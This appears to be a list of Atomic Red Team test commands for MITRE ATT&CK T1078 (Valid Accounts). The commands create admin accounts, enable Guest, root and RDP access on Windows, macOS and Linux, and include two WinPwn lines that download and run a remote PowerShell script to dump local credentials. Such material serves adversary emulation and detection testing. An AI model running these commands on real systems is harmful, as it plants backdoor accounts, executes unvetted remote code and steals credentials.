1078.001
Enable Guest account with RDP capability and admin privileges
| net user #{guest_user} /active:yes |
| net user #{guest_user} #{guest_password} |
| net localgroup #{local_admin_group} #{guest_user} /add |
| net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add |
| reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f |
| reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f |
Activate Guest Account
| net user #{guest_user} /active:yes |
Enable Guest Account on macOS
| sudo sysadminctl -guestAccount on |
1078.003
Create local account with admin privileges
| net user art-test /add |
| net user art-test #{password} |
| net localgroup administrators art-test /add |
Create local account with admin privileges - MacOS
| dscl . -create /Users/AtomicUser |
| dscl . -create /Users/AtomicUser UserShell /bin/bash |
| dscl . -create /Users/AtomicUser RealName "Atomic User" |
| dscl . -create /Users/AtomicUser UniqueID 503 |
| dscl . -create /Users/AtomicUser PrimaryGroupID 503 |
| dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser |
| dscl . -passwd /Users/AtomicUser mySecretPassword |
| dscl . -append /Groups/admin GroupMembership AtomicUser |
Create local account with admin privileges using sysadminctl utility - MacOS
| sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin |
Enable root account using dsenableroot utility - MacOS
| dsenableroot #current user |
| dsenableroot -u art-tester -p art-tester -r art-root #new user |
Add a new/existing user to the admin group using dseditgroup utility - macOS
| dseditgroup -o edit -a art-user -t user admin |
WinPwn - Loot local Credentials - powerhell kittie
| $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' |
| iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') |
| obfuskittiedump -consoleoutput -noninteractive |
WinPwn - Loot local Credentials - Safetykatz
| $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' |
| iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') |
| safedump -consoleoutput -noninteractive |
Create local account (Linux)
| useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art |
| su art |
| whoami |
| exit |
Reactivate a locked/expired account (Linux)
| useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art |
| usermod --lock art |
| usermod --expiredate "1" art |
| usermod --unlock art |
| usermod --expiredate "99999" art |
| su art |
| whoami |
| exit |
Login as nobody (Linux)
| cat /etc/passwd |grep nobody |
| # -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin |
| chsh --shell /bin/bash nobody |
| usermod --password $(openssl passwd -1 nobody) nobody |
| su nobody |
| whoami |
| exit |